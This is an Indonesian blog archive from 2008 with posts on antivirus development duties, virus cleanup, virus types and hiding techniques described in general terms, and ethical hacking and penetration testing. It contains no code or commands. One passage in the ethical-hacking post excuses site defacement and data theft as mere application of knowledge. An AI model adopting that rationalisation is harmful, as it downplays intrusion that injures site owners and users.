10. Komputer yang lambat seringkali disebabkan karena hal lain; kekurangan memory, ada virus, dan sebagainya.

KEWAJIBAN PROGRAMER ANTIVIRUS

2008-11-24T21:38:00.002+07:00

Saat ini untuk menjadi programmer antivirus yang baik tidaklah mudah, Anda perlu tahu teknik-teknik pemrograman virus yang setiap hari semakin bertambah sulit.
Program antivirus yang Anda buat sebaiknya juga mengikuti perkembangan teknologi virus. Untuk membuat program antivirus yang baik tidaklah mudah, namun ada beberapa hal yang perlu Anda ingat sebagai pembuat Antivirus jika Anda ingin program Anda dipakai orang lain, dan tidak membahayakan orang tersebut.

1. Program Anda sebaiknya bisa mematikan virus di memori, dan dapat memberi peringatan jika ada sesuatu yang aneh di memori komputer pemakai (misalnya besar base mem kurang dari 640 Kb)
2. Dalam membuat ID virus pilihlah beberapa lokasi, lokasi yang baik adalah di awal virus dan di bagian penting virus (misalnya di bagian dekripsi header program asli) ini untuk memastikan tidak ada yang mengubah lokasi dan sistem enkripsi (jika ada) header program asli.
3. Jika data/header di enkrip, verifikasikan data yang didapat dari perhitungan, misalnya lihat apakah CS dan IP asli yang di dapat dari perhitungan masih dalam batas besar file, atau apakah instruksi JMP pertama di file COM masuk akal (kurang dari panjang file).
4. Buat cadangan file jika file yang dibersihkan dikhawatirkan rusak
5. Lakukan self check di awal program. Jika tidak seluruh bagian program bisa di self check, bagian ID virus perlu diperiksa apakah berubah atau tidak (misalnya dengan checksum).
6. Buatlah penjelasan yang jelas tentang cara penggunaan antivirus.
7. Jika program hanya dapat dijalankan di DOS periksalah selalu ketika program dijalankan apakah program tersebut benar-benar berjalan di DOS.
8. Jika ingin membuat program antivirus residen, jangan memakai ID virus yang tidak terenkripsi di memori, antivirus lain yang tidak mengenal antivirus Anda tersebut, justru akan menganggap adanya sebuah (atau beberapa buah) virus aktif di memori. Hal ini bisa terjadi, karena beberapa antivirus memeriksa seluruh memori terhadap adanya ID virus.
9. Untuk antivirus yang non residen teknik no 8 juga perlu digunakan, ini perlu agar program antivirus yang lain tidak mengira program ini terkena virus. Kadang-kadang program juga meninggalkan bekas di memori, yang mungkin bisa dicurigai oleh antivirus lain sebagai virus. Jika Anda tidak ingin menerapkan teknik tersebut, Anda bisa menghapus memori variabel ID virus setelah selesai digunakan.
10. Jika mungkin, untuk virus yang polimorfik gunakan metode heuristic (dan atau emulasi) untuk men-scan dan teknik emulasi untuk mendekrip, atau mengembalikan program asli.

Seharusnya 10 hal tersebut cukup, Anda bisa menambahkan sendiri hal tersebut jika perlu. Misalnya : masalah kecepatan scanning dan lain-lain.

PROSES PEMBERSIHAN VIRUS

2008-11-24T21:32:00.001+07:00

Langkah proses pembersihan yang baik adalah sebagai berikut :

Jika Anda menjalankan komputer pribadi
1. Boot komputer Anda dengan disket startup yang bersih dari virus (dan di write protect)
2. Jalankan program virus scanner/cleaner pada sebuah file yang terinfeksi
3. Coba jalankan file tersebut, jika file tersebut menjadi rusak, jangan teruskan lagi
4. Jika program dapat berjalan lancar, cobakan sekali lagi pada beberapa file (cari yang ukurannya kecil, yang sedang dan yang besar).
5. File yang ukurannya besar perlu di-check, biasanya file ini mengandung internal overlay yang membuat filenya rusak jika terkena virus.

Jika Anda adalah Admin jaringan
1. Anda mengambil sampel virus ke disket dan mencoba untuk membersihkannya di komputer lain, ini dilakukan untuk tidak mengganggu pekerjaan yang mungkin sedang dilakukan oleh orang lain. Hal ini juga untuk mengantisipasi, kemungkinan adanya virus baru yang mirip dengan virus lain (bayangkan apa jadinya jika terjadi salah pembersihan sehingga seluruh program di jaringan menjadi tidak bisa dipakai!).
2. Jika gagal dibersihkan Anda perlu memanggil ahlinya untuk menangani, atau mencari informasi lebih lanjut di Internet.
3. Percobaan pada beberapa file tujuannya untuk mencegah salah deteksi dan atau salah perbaikan oleh program antivirus.
4. Jika virus dianggap berbahaya dan aktivitas menggunakan jaringan bisa ditunda sementara, mungkin untuk sementara jaringan dimatikan.

MEMINIMALKAN RESIKO PENGGUNAAN ANTIVIRUS

2008-11-24T21:29:00.001+07:00

Sebagai pengguna program antivirus ada beberapa hal yang bisa Anda lakukan untuk meminimalkan risiko penggunaan antivirus.

1. Carilah antivirus yang baik, baik di sini artinya program tersebut dapat dipercaya untuk mendeteksi dan membasmi berbagai virus yang ada. Jangan terbuai dengan janji-janji yang ditawarkan para vendor antivirus, dan jangan terbuai juga dengan nama merk yang cukup terkenal. Cobalah cari perbandingan antara berbagai antivirus di berbagai majalah / situs di internet.

2. Gunakan selalu Antivirus terbaru, Anda bisa mendapatkannya dari Internet atau dari beberapa majalah. Antivirus yang lama memiliki risiko yang besar jika digunakan (lebih dari 6 bulan sudah sangat berbahaya).

3. Buatlah cadangan untuk data dan program Anda yang penting.

4. Lakukan proses pembersihan virus dengan benar jika Anda menemukan virus

5. Pastikan program Antivirus yang Anda dapat adalah yang asli, ada kemungkinan seseorang telah mengubah antivirus tersebut, atau mungkin menularinya dengan suatu virus.

6. Hubungi ahlinya jika Anda merasa tidak dapat mengatasi virus di komputer atau jaringan Anda

SUMBER BAHAYA PROGRAM ANTIVIRUS

2008-11-24T21:26:00.001+07:00

Program Antivirus bisa berbahaya karena sebab-sebab berikut:

1. Beberapa program antivirus hanya menggunakan teknik sederhana yang bisa dengan mudah di-tipu oleh pembuat virus Misalnya program antivirus hanya memeriksa beberapa byte di awal virus, pembuat virus bisa saja membuat virus versi lain yang sama di bagian awal tetapi berbeda di bagian-bagian yang penting, misalnya di rutin enkripsi/dekripsi header file asli. Ini akan membuat program antivirus menjadi perusak file bukan penyelamat file.

2. Beberapa antivirus juga dapat di tipu dengan mengubah-ubah file signature antivirus. File signature merupakan file yang berisi ID dari setiap virus yang dikenal oleh antivirus, jika ID tersebut di ubah maka antivirus tidak akan mengenalnya. Antivirus yang baik seharusnya dapat memeriksa jika file signature-nya berubah.

3. Program Antivirus tidak membuat backup file yang dibersihkan. Sering program antivirus (terutama yang spesifik) tidak menyediakan sarana untuk membuat backup file yang dibersihkan, padahal ini sangat penting andaikata proses pembersihan gagal. Program Antivirus tidak melakukan self check. Self check itu perlu, program antivirus dapat saja diubah oleh orang lain sebelum sampai ke tangan pengguna. Program-program antivirus komersial biasanya melakukan self check untuk memastikan dirinya tidak diubah oleh siapapun, namun ada juga yang tidak dan ini berbahaya.

4. Pada program-program antivirus lokal, yang sering disertakan pada beberapa artikel komputer, biasanya menyertakan source code-nya, sebaiknya Anda mengcompile sendiri source tersebut jika Anda ragu pada keaslian file exe-nya.

5. Program Antivirus residen bisa di matikan dengan mudah Antivirus residen yang baik seharusnya tidak bisa dideteksi dan di uninstall dengan mudah. Contoh antivirus residen yang kurang baik adalah VSAFE (ada di paket DOS). VSAFE bisa dideteksi dan dimatikan dengan menggunakan interrupt (coba Anda pelajari/debug program vsafe yang ada di DOS agar Anda mengerti). Pemakai akan mendapatkan rasa aman yang palsu dengan menggunakan antivirus semacam ini. Tidak ada rasa aman justru lebih baik dari rasa aman yang palsu.

6. Program antivirus tidak memberi peringatan kadaluarsa. Seiring dengan berjalannya waktu, virus-virus yang bermunculan semakin banyak dan tekniknya semakin canggih. Program antivirus yang baik sebaiknya memberi peringatan jika Antivirus yang digunakan sudah terlalu out of date. Ini penting supaya kejadian antivirus yang menyebarkan virus tidak terulang

HATI-HATI DENGAN ANTIVIRUS KOMPUTER

2008-11-24T21:22:00.002+07:00

Tahukah Anda bahwa program Antivirus yang semestinya dapat melindungi data Anda juga dapat berbahaya jika tidak digunakan dengan benar?.

Kenapa?

Apa yang bisa kita lakukan sebagai user?,

Apa yang seharusnya kita lakukan sebagai programmer antivirus?.

Sejak pertama ditemukan virus telah mengalami perkembangan teknologi yang cukup besar, demikian juga program Antivirus yang ada. Sayangnya perkembangan Antivirus biasanya hanya mengejar perkembangan virus dan bukan berusaha mendahuluinya. Antivirus yang ketinggalan (teknologinya) justru dapat mengundang bahaya bagi pemakai.

Ketika virus-virus berhasil dideteksi keberadaannya, virus-virus yang baru selalu bermunculan dengan teknologi yang lebih canggih yang membuat antivirus menjadi tak berdaya . Antivirus yang lama misalnya, selalu dapat di-'tipu' dengan teknologi stealth, dengan demikian ketika antivirus ini berusaha mendeteksi file-file yang lain, virus yang stealth tadi justru menyebarkan dirinya ke setiap file yang diperiksa.

Di berbagai majalah tentunya Anda sering melihat adanya program-program antivirus " satuan " (spesifik) yang tujuannya untuk mendeteksi satu jenis virus. Biasanya para pembuat antivirus tidak memberitahukan cara-cara yang benar untuk menggunakan program antivirus ini, padahal antivirus spesifik memiliki risiko yang besar jika tidak digunakan secara benar.

Antivirus spesifik hanya mampu mendeteksi satu jenis virus (dan mungkin beberapa variannya) dan biasanya mampu melumpuhkan virus di memori. Jika Anda menemukan suatu virus dan Anda yakin nama virusnya Anda bisa menggunakan Antivirus semacam ini, namun jika Anda tidak tahu, sebaiknya jangan coba-coba. Jika ternyata virus yang aktif adalah virus lain, yang tentunya tidak terdeteksi oleh antivirus ini, maka antivirus tersebut justru dapat menyebarkan virus yang ada ke seluruh file program yang diperiksanya.

Bahaya yang lebih menakutkan adalah jika antivirus salah mendeteksi suatu virus dan salah membersihkannya sehingga file program yang Anda coba untuk perbaiki justru menjadi rusak. Kejadian ini pernah terjadi misalnya pada kasus virus DenHard, virus ini benar-benar mirip dengan die hard, namun virus ini menggunakan teknik yang berbeda untuk mengembalikan header file yang asli, beberapa antivirus yang berusaha membersihkannya justru merusakkan file program tempat virus itu berada.

Selain terjadi pada kasus virus DenHard, kasus ini pun pernah (dan mungkin masih akan terus) terjadi pada beberapa virus. Salah satu alasan para pembuat virus membuat virus yang mirip adalah supaya virus tersebut sulit dibersihkan, karena para pembuat antivirus tidak suka jika virusnya dapat dengan mudah dibersihkan oleh user

DAFTAR MILIS

2008-11-23T15:04:00.009+07:00

MENGENAL VIRUS KOMPUTER

2008-11-23T14:56:00.001+07:00

Saat Ini, pastilah kita semua selaku konsumen/pengguna jasa komputer dan jaringan ( internet ) sudah sangat sering mendengar istilah “virus” yang terkadang meresahkan kita. Tulisan ini akan mengupas lebih jauh mengenai virus, yang nantinya diharapkan dapat membuat kita semua mengerti dan memahami tentang virus.

ASAL MUASAL VIRUS

1949, John von Neumann, menggungkapkan " teori self altering automata " yang merupakan hasil riset dari para ahli matematika.

1960, Lab BELL (AT&T), para ahli di lab BELL (AT&T) mencoba-coba teori yang diungkapkan oleh John von Neumann, dengan membuat suatu jenis permainan/game. Mereka membuat program yang dapat memperbanyak dirinya dan dapat menghancurkan program buatan lawan. Program yang mampu bertahan dan menghancurkan semua program lain, akan dianggap sebagai pemenangnya. Permainan ini akhirnya menjadi permainan favorit di tiap-tiap lab komputer. Tetapi, semakin lama program yang diciptakan makin berbahaya, sehingga mereka melakukan pengawasan dan pengamanan yang ketat terhadap permainan ini.

1980, Program-program tersebut yang akhirnya dikenal dengan sebutan "virus" ini berhasil menyebar keluar lingkungan laboratorium, dan mulai beredar di masyarakat umum.

PENGERTIAN VIRUS

"A program that can infect other programs by modifying them to include a slighty altered copy of itself. A virus can spread throughout a computer system or network using the authorization of every user using it to infect their programs. Every programs that gets infected can also act as a virus that infection grows“
( Fred Cohen )

Pertama kali istilah “virus” digunakan oleh Fred Cohen pada tahun 1984 di Amerika Serikat. Virus komputer dinamakan “virus” karena memiliki beberapa persamaan mendasar dengan virus pada istilah kedokteran (biological viruses).

Virus komputer bisa diartikan sebagai suatu program komputer biasa. Tetapi memiliki perbedaan yang mendasar dengan program-program lainnya,yaitu virus dibuat untuk menulari program-program lainnya, mengubah, memanipulasinya bahkan sampai merusaknya. Ada yang perlu dicatat disini, virus hanya akan menulari apabila program pemicu atau program yang telah terinfeksi tadi dieksekusi, disinilah perbedaannya dengan "worm". Tulisan ini tidak akan bahas worm karena nanti akan mengalihkan kita dari pembahasan mengenai virus ini.

KRITERIA VIRUS

Suatu program dapat disebut sebagai suatu virus apabila memenuhi minimal 5 kriteria berikut :

1. Kemampuan untuk mendapatkan informasi

Pada umumnya suatu virus memerlukan daftar nama-nama file yang ada dalam suatu directory. Untuk apa? Agar dia dapat memperoleh daftar file yang bisa dia tulari. Misalnya, virus makro yang akan menginfeksi semua file data MS Word, akan mencari daftar file berekstensi *.doc. Disinilah kemampuan mengumpulkan informasi itu
diperlukan agar virus dapat membuat daftar/data semua file, lalu memilahnya dengan mencari file-file yang bisa ditulari. Biasanya data ini tercipta saat file yang tertular/terinfeksi virus atau file program virus itu sendiri dibuka oleh user. Sang virus akan segera melakukan pengumpulan data dan menaruhnya (biasanya) di RAM, sehingga
apabila komputer dimatikan semua data hilang. Tetapi data-data ini akan tercipta kembali setiap kali virus itu diaktifkan. Biasanya data-data ini disimpan juga sebagai hidden file oleh virus tersebut.

2. Kemampuan memeriksa suatu program

Suatu virus juga harus bisa memeriksa suatu file yang akan ditulari, misalnya dia bertugas menulari program berekstensi *.doc, maka dia harus memeriksa apakah file dokumen tersebut telah terinfeksi ataupun belum, karena jika sudah, akan percuma menularinya lagi. Ini sangat berguna untuk meningkatkan kemampuan suatu virus dalam hal kecepatan menginfeksi suatu file/program. Yang umum dilakukan oleh virus adalah
memiliki/memberi tanda pada file/program yang telah terinfeksi sehingga mudah untuk dikenali oleh virus tersebut. Contoh penandaan adalah misalnya memberikan suatu byte yang unik di setiap file yang telah terinfeksi.

3. Kemampuan untuk menggandakan diri

Kalo ini memang virus "bang-get", maksudnya, tanpa kemampuan ini tak adalah virus. Inti dari virus adalah kemampuan mengandakan diri dengan cara menulari file lainnya. Suatu virus apabila telah menemukan calon korbannya maka ia akan mengenalinya dengan memeriksanya. Jika belum terinfeksi maka sang virus akan memulai aksinya penularan dengan cara menuliskan byte pengenal pada file tersebut, dan seterusnya
mengcopikan/menulis kode objek virus diatas file sasaran. Beberapa cara umum yang dilakukan oleh virus untuk menulari/menggandakan dirinya adalah :
• File yang akan ditulari dihapus atau diubah namanya. Kemudian diciptakan suatu file berisi program virus itu sendiri menggunakan nama file yang asli.
• Program virus yang sudah dieksekusi/load ke memori akan langsung menulari file-file lain dengan cara menumpangi seluruh file yang ada.

4. Kemampuan mengadakan manipulasi

Rutin (routine) yang dimiliki suatu virus akan dijalankan setelah virus menulari suatu file. Isi dari suatu rutin ini dapat beragam mulai dari yang tidak berbahaya sampai yang melakukan perusakan. Rutin ini umumnya digunakan untuk memanipulasi file atau pun mempopulerkan pembuatnya ! Rutin ini memanfaatkan kemampuan dari suatu sistem operasi (Operating System), sehingga memiliki kemampuan yang sama dengan yang
dimiliki sistem operasi. Misal :
a. Membuat gambar atau pesan pada monitor
b. Mengganti/mengubah-ubah label dari tiap file, direktori, atau label dari drive di PC
c. Memanipulasi file yang ditulari
d. Merusak file
e. Mengacaukan kerja printer, dsb

5. Kemampuan Menyembunyikan diri

Kemampuan menyembunyikan diri ini harus dimiliki oleh suatu virus agar semua pekerjaan baik dari awal sampai berhasilnya penularan dapat terlaksana. Langkah langkah yang biasa dilakukan adalah:
- Program virus disimpan dalam bentuk kode mesin dan digabung dengan program lain yang dianggap berguna oleh pemakai
- Program virus diletakkan pada Boot Record atau track pada disk yang jarang diperhatikan oleh komputer itu sendiri
- Program virus dibuat sependek mungkin, dan hasil file yang diinfeksi tidak terlalu berubah ukurannya
- Virus tidak mengubah keterangan/informasi waktu suatu file
- dll

SIKLUS HIDUP VIRUS

Siklus hidup virus secara umum, melalui 4 tahap:

a. Dormant phase ( Fase Istirahat/Tidur )
Pada fase ini virus tidaklah aktif. Virus akan diaktifkan oleh suatu kondisi tertentu, semisal: tanggal yang ditentukan, kehadiran program lain/dieksekusinya program lain, dsb. Tidak semua virus melalui fase ini.
b. Propagation phase ( Fase Penyebaran )
Pada fase ini virus akan mengkopikan dirinya kepada suatu program atau ke suatu tempat dari media storage (baik hardisk, RAM dsb). Setiap program yang terinfeksi akan menjadi hasil “kloning” virus tersebut (tergantung cara virus tersebut menginfeksinya).
c. Trigerring phase ( Fase Aktif )
Di fase ini virus tersebut akan aktif dan hal ini juga di picu oleh beberapa kondisi seperti pada Dormant Phase.
d. Execution phase ( Fase Eksekusi )
Pada fase inilah virus yang telah aktif tadi akan melakukan fungsinya. Seperti menghapus file, menampilkan pesan-pesan, dsb

JENIS – JENIS VIRUS

Untuk lebih mempertajam pengetahuan kita tentang virus, saya akan coba memberikan penjelasan tentang jenis-jenis virus yang sering berkeliaran di masyarakat umum.

1. Virus Makro
Jenis virus ini pasti sudah sangat sering kita dengar. Virus ini ditulis dengan bahasa pemrograman dari suatu aplikasi bukan dengan bahasa pemrograman dari suatu Operating System. Virus ini dapat berjalan apabila aplikasi pembentuknya dapat berjalan dengan baik. Sebagai contoh jika pada komputer mac dijalankan aplikasi Word, maka virus makro yang dibuat dari bahasa makro Word dapat bekerja pada komputer bersistem operasi Mac ini.
Contoh virus:
- Varian W97M, misal W97M.Panther
Panjang 1234 bytes, akanmenginfeksi NORMAL.DOT dan menginfeksi dokumen apabila dibuka.
- WM.Twno.A;TW
Panjang 41984 bytes, akan menginfeksi Dokumen Ms.Word yang menggunakan bahasa makro, biasanya berekstensi *.DOT dan *.DOC
- dll

2. Virus Boot Sector
Virus Boot sector ini sudah umum sekali menyebar. Virus ini dalam menggandakan dirinya, akan memindahkan atau menggantikan boot sector asli dengan program booting virus. Sehingga saat terjadi booting maka virus akan diload ke memori dan selanjutnya virus akan mempunyai kemampuan mengendalikan hardware standar (contoh : monitor, printer dsb) dan dari memori ini pula virus akan menyebar ke seluruh drive yang ada dan yang terhubung ke komputer (contoh : floopy, drive lain selain drive c:).
Contoh virus :
- Varian virus wyx ex: wyx.C(B)
Menginfeksi boot record dan floopy ; Panjang :520 bytes; Karakteristik : memory resident dan terenkripsi.
- Varian V-sign :
Menginfeksi : Master Boot Record ; Panjang 520 bytes; Karakteristik : menetap di memori (memory resident),terenkripsi, dan polymorphic)
- Stoned.june 4th/ bloody!:
Menginfeksi : Master Boot Record dan floopy; Panjang 520 bytes; Karakteristik : menetap di memori (memory resident), terenkripsi dan menampilkan pesan "Bloody!june 4th 1989" setelah komputer melakukan booting sebanyak 128 kali.

3. Stealth Virus
Virus ini akan menguasai tabel interrupt pada DOS yang sering kita kenal dengan "Interrupt interceptor". Virus ini berkemampuan untuk mengendalikan instruksi-instruksi level DOS dan biasanya mereka tersembunyi sesuai namanya baik secara penuh ataupun ukurannya.
Contoh virus :
- Yankee.XPEH.4928,
Menginfeksi file *.COM dan *.EXE ; Panjang 4298 bytes; Karakteristik: menetap di memori, ukurantersembunyi, memiliki pemicu
- WXYC (yang termasuk kategori boot record pun karena masuk kategri stealth dimasukkan pula disini), Menginfeksi floopy an motherboot record; Panjang 520 bytes; Karakteristik : menetap di memori; ukuran dan virus tersembunyi.
- Vmem(s):
Menginfeksi file file *.EXE, *.SYS, dan *.COM ; Panjang fie 3275 bytes; Karakteristik:menetap di memori, ukuran tersembunyi, di enkripsi.
- dll

4. Polymorphic Virus
Virus ini Dirancang buat mengecoh program antivirus, artinya virus ini selalu berusaha agar tidak dikenali oleh antivirus dengan cara selalu merubah rubah strukturnya setiap kali selesai menginfeksi file/program lain.
Contoh virus:
- Necropolis A/B,
Menginfeksi file *.EXE dan *.COM; Panjang file 1963 bytes; Karakteristik: menetap di memori, ukuran dan virus tesembunyi,terenkripsi dan dapat berubah ubah struktur
- Nightfall,
Menginfeksi file *.EXE; Panjang file 4554 bytes; Karakteristik : menetap di memori, ukuran dan virus tesembunyi,memiliki pemicu, terenkripsidan dapat
berubah-ubah struktur
- dll

5. Virus File/Program
Virus ini menginfeksi file-file yang dapat dieksekusi langsung dari sistem operasi, baik itu file *.EXE, maupun *.COM biasanya juga hasil infeksi dari virus ini dapat diketahui dengan berubahnya ukuran file yang diserangnya.

6. Multi Partition Virus
Virus ini merupakan gabungan dari virus boot sector dan virus file. Artinya pekerjaan yang dilakukan berakibat dua, yaitu dia dapat menginfeksi file-file *.EXE atau *.COM dan juga menginfeksi boot sector.

BEBERAPA CARA PENYEBARAN VIRUS

Virus layaknya virus biologi harus memiliki media untuk dapat menyebar, virus komputer dapat menyebar ke berbagai komputer/mesin lainnya juga melalui berbagai media, diantaranya:

1. Disket, media storage R/W
Media penyimpanan eksternal dapat menjadi sasaran empuk bagi virus untuk dijadikan media. Baik sebagai tempat menetap ataupun sebagai media penyebarannya. Media yang bias melakukan operasi R/W (Read dan Write) sangat memungkinkan untuk ditumpangi virus dan dijadikan sebagai media penyebaran.

2. Jaringan ( LAN, WAN,dsb)
Hubungan antara beberapa computer secara langsung sangat memungkinkan suatu virus ikut berpindah saat terjadi pertukaran/pengeksekusian file yang mengandung virus.

3. WWW (internet)
Sangat mungkin suatu situs sengaja ditanamkan suatu “virus” yang akan menginfeksi komputer-komputer yang mengaksesnya.

4. Software yang Freeware, Shareware atau bahkan Bajakan
Banyak sekali virus yang sengaja ditanamkan dalam suatu program yang disebarluaskan baik secara gratis, atau trial version.

5. Attachment pada email, transfering file
Hampir semua jenis penyebaran virus akhir-akhir ini menggunakan email attachment dikarenakan semua pemakai jasa internet pastilah menggunakan email untuk berkomunikasi, file-file ini sengaja dibuat mencolok/menarik perhatian, bahkan seringkali memiliki ekstensi ganda pada penamaan filenya.

PENANGULANGANNYA

1. Langkah-Langkah untuk Pencegahan
Untuk pencegahan anda dapat melakukan beberapa langkah-langkah berikut :
• Gunakan antivirus yang anda percayai dengan update terbaru. Tidak perduli apapun merknya asalkan selalu diupdate, dan auto-protect dinyalakan maka komputer anda terlindungi.
• Selalu scanning semua media penyimpanan eksternal yang akan digunakan, mungkin hal ini agak merepotkan tetapi jika auto-protect antivirus anda bekerja maka prosedur ini dapat dilewatkan.
• Jika anda terhubung langsung ke Internet cobalah untuk mengkombinasikan antivirus anda dengan Firewall, Anti-spamming, dsb.
• Selalu waspada terhadap fle-file yang mencurigakan, contoh : file dengan 2 buah exstension atau file executable yang terlihat mencurigakan.
• Untuk software freeware + shareware, ada baiknya anda mengambilnya dari situs resminya.
• Semampunya hindari membeli barang bajakan, gunakan software-software open source.

2. Langkah-Langkah Apabila telah Terinfeksi
• Deteksi dan tentukan dimanakah kira-kira sumber virus tersebut apakah di disket, jaringan, email dsb. Jika anda terhubung ke jaringan maka ada baiknya anda mengisolasi komputer anda dulu (baik dengan melepas kabel atau mendisable sambungan internet dari control panel)
• Identifikasi dan klasifikasikan jenis virus apa yang menyerang pc anda, dengan cara: Gejala yang timbul, misal : pesan, file yang corrupt atau hilang dsb Scan dengan antivirus anda, jika anda terkena saat auto-protect berjalan berarti virus definition di dalam komputer anda tidak memiliki data virus ini, cobalah update secara manual atau mendownload virus definitionnya untuk kemudian anda install. Jika virus tersebut memblok usaha anda untuk mengupdate, maka upayakan untuk menggunakan media lain (komputer) dengan antivirus yang memiliki update terbaru.
• Bersihkan virus tersebut. Setelah anda berhasil mendeteksi dan mengenalinya maka usahakan segera untuk mencari removal atau cara-cara untuk memusnahkannya di situs-situs yang memberikan informasi perkembangan virus tersebut. Hal ini perlu dilakukan apabila antivirus dengan update terbaru anda tidak berhasil memusnahkannya.
• Langkah terburuk. Jika semua hal diatas tidak berhasil adalah memformat ulang komputer anda .

ETHICAL HACKER.

2008-11-23T14:54:00.000+07:00

“HACKER” adalah: Seseorang yang tertarik untuk mengetahui secara mendalam
mengenai kerja suatu system,komputer,atau jaringan komputer."

Pernah dengar ada sekelompok orang ataupun hanya seorang saja, yang kerjanya ngetes keamanan sistem perusahaan, atau sistem komputer dan tebak…...dia bakal di bayar mahal untuk itu. Yup, mereka ini yang disebut HACKER, lebih tepatnya ETHICAL HACKER.
Ethical Hacker adalah hacker yang melakukan penyusupan ke dalam suatu sistem, mencari kelemahan, mengeksploitasi sistem dan melakukan pencegahan terhadap lubang-lubang kelemahan yang ada atas ijin pemilik sistem tersebut serta membuat laporan atau report secara tertulis untuk dijadikan acuan keamanan sistem.mereka ini yang tetap membuat jaringan internet dan komputer di dunia ini jadi aman, menemukan celah-celah baru untuk terus diperbaiki sehingga keamanannya tetap terjamin dan hal yang mereka kerjakan itu adalah:
1. Riset dan penelitian
2. Security Project

Pada bagian Riset, mereka akan mencari kelemahan dari sistem untuk selanjutnya dibuat laporan dan diberitakan di publik dengan terlebih dahulu mengontak vendor pembuat sistem tersebut. Ada 2 bagian dalam Security Project ini yang akan kita bahas yang pertama adalah:

VULNERABILITY ASSESSMENT (VA)
Pada hal ini, security auditor harus mencari kelemahan pada server dan aplikasi yang terkait dan mencegah penyalahgunaan terhadap Automated Vulnerability Assessment Tools seperti Nessus, Max Patrol 7, Acunetix Web Vulnerability Assessment, NsAuditor, dll serta dengan mencari kelemahan-kelemahan aktual yang berhubungan dengan host-host dari klien si security auditor.Yang akan dilakukan di VA mencakup:

1. Test VA dapat dilakukan di area internal, DMZ atau external.
2. Tidak menyerang security hole (kelemahan-kelemahan/lubang keamanan)
3. Tidak melakukan serangan Denial of Service ataupun Buffer Overflow
4. Automated Vulnerability Scanner seperti Nessus, Max Patrol 7 atau Acunetix akan menjadi tools utama.

So, jelas bahwa dalam VA, yang terjadi adalah kita menganalisa suatu sistem, melakukan pencegahan terhadap penyalahgunaan Automated Vulnerability Assessment Tools dan melakukan reporting sesuai dengan hasil-hasil yang ditemukan.

PENETRATION TESTING (PT)
Pada hal ini, security auditor tidak hanya harus mencari kelemahan pada server dan aplikasi yang terkait tetapi juga menyerangnya serta berusaha mendapatkan akses di target untuk me-remote server dari jauh. Gampangnya, kita disuruh masuk ke server dan mendapatkan hak akses ke server, dengan cara ini kelemahan sebuah sistem menjadi jelas karena semuanya dilakukan secara langsung (live hacking).
Yang akan dilakukan pada PT mencakup:

1. Sama halnya dengan test VA, hak akses ke area internal, DMZ atau external.
2. Kelemahan-kelemahan yang ada akan ditest dan diserang.
3. Serangan berbahaya seperti DoS dan Buffer Overflow akan dipraktekkan atas ijin klien.
4. Scanner otomatis (Automated Web Assesment Tool, Automated Vulnerability Scanner) akan lebih banyak digunakan, bahkan termasuk exploit dan tool-tool lain.

Ada 2 Tipe Penetration Testing

1. Black Box Penetration Testing
• Pada umumnya, pen tester (penetration tester) tidak dibekali pengetahuan yang cukup pada remote host/remote network (jaringan target).
• Hanya nama perusahaan dan alamat IP yang dapat diketahui.
• Merupakan simulasi dari dunia hacking sebenarnya yang dilakukan oleh hacker yang tidak mempunyai pengetahuan tentang remote network (jaringan target)

2. White Box Penetration Testing
• Pen Tester dibekali pengetahuan yang cukup tentang remote network.
• Mengetahui seluk beluk semua tipe peralatan jaringan (Cisco gear, TCP/IP, DNS, Data routing, dll)
• Pengetahuan akan WebServer (Apache, Netscape, IIS, Zeus dll)
• Operating System (Windows/*nix)
• Database Platform (Oracle,Ms SQL Server, MySql)
• Load Balancers (Alteon)
• Firewalls (IDS, IPS, Cisco PIX, dll)
• Merupakan simulasi dari dunia hacking yang sebenarnya, dipraktekkan oleh hacker yang memiliki kompetensi dan pengetahuan yang sangat luas.

Nah, udah ngerti khan bahwa di dunia ini tetap ada kebaikan dan kejahatan. Keduanya hidup dalam satu lingkaran yang namanya bumi. So, mustahil khan kalo ga ada persaingan antara 2 sifat ini. Hacker yang baik, dia tau hal-hal yang harus dia kerjakan sebagai seorang hacker. Kalau anda melihat ada hacker yang merusak situs dan mengambil data-data seenaknya (maaf, maksud saya meng-copy-paste data) lihat lagi bahwa apa yang dilakukannya hanya sebuah implementasi dari pengetahuan yang ia dapatkan. Sejogyanya, apabila Anda menemukan suatu penemuan, maka Anda akan ingin untuk segera merealisasinya bukan?!

BELAJAR JADI HACKER

2008-11-23T14:48:00.002+07:00

Hacker dengan keahliannya dapat melihat & memperbaiki kelemahan perangkat lunak di komputer; biasanya kemudian di publikasikan secara terbuka di Internet agar sistem menjadi lebih baik. Sialnya, segelintir manusia berhati jahat menggunakan informasi tersebut untuk kejahatan mereka biasanya disebut cracker.
Pada dasarnya dunia hacker & cracker tidak berbeda dengan dunia seni, disini kita berbicara seni keamanan jaringan Internet.

Saya berharap ilmu keamanan jaringan di tulisan ini digunakan untuk hal-hal yang baik jadilah Hacker bukan Cracker. Jangan sampai anda terkena karma karena menggunakan ilmu untuk merusak milik orang lain. Apalagi, pada saat ini kebutuhan akan hacker semakin bertambah di Indonesia dengan semakin banyak dotcommers yang ingin IPO di berbagai bursa saham. Nama baik & nilai sebuah dotcom bisa jatuh bahkan menjadi tidak berharga jika dotcom di bobol. Dalam kondisi ini, para hacker di harapkan bisa menjadi konsultan keamanan bagi para dotcommers tersebut – karena SDM pihak kepolisian & aparat keamanan Indonesia amat sangat lemah & menyedihkan di bidang Teknologi Informasi & Internet. Apa boleh buat cybersquad, cyberpatrol swasta barangkali perlu di budayakan untuk survival dotcommers Indonesia di Internet.

Berbagai teknik keamanan jaringan Internet dapat di peroleh secara mudah di Internet antara lain di

http://www.rootshell.com
http://www.linuxfirewall.org/
http://www.linuxdoc.org
http://www.sans.org
http://www.redhat.com/mirrors/LDP/HOWTO/
http://www.cerias.purdue.edu/coast/firewalls/
Sebahagian dari teknik ini berupa buku-buku yang jumlah-nya beberapa ratus halaman yang dapat di ambil secara cuma-cuma (gratis).

Beberapa Frequently Asked Questions (FAQ) tentang keamanan jaringan bisa diperoleh di :
http://www.iss.net/vd/mail.html
http://www.v-one.com/documents/fw-faq.htm

Dan bagi para experimenter beberapa script / program yang sudah jadi dapat diperoleh antara lain di :
http://bastille-linux.sourceforge.net/
http://www.redhat.com/support/docs/tips/firewall/firewallservice.html

Bagi pembaca yang ingin memperoleh ilmu tentang jaringan dapat di download secara cuma-cuma dari :

http://www.bogor.net/idkf/

http://louis.idaman.com/idkf

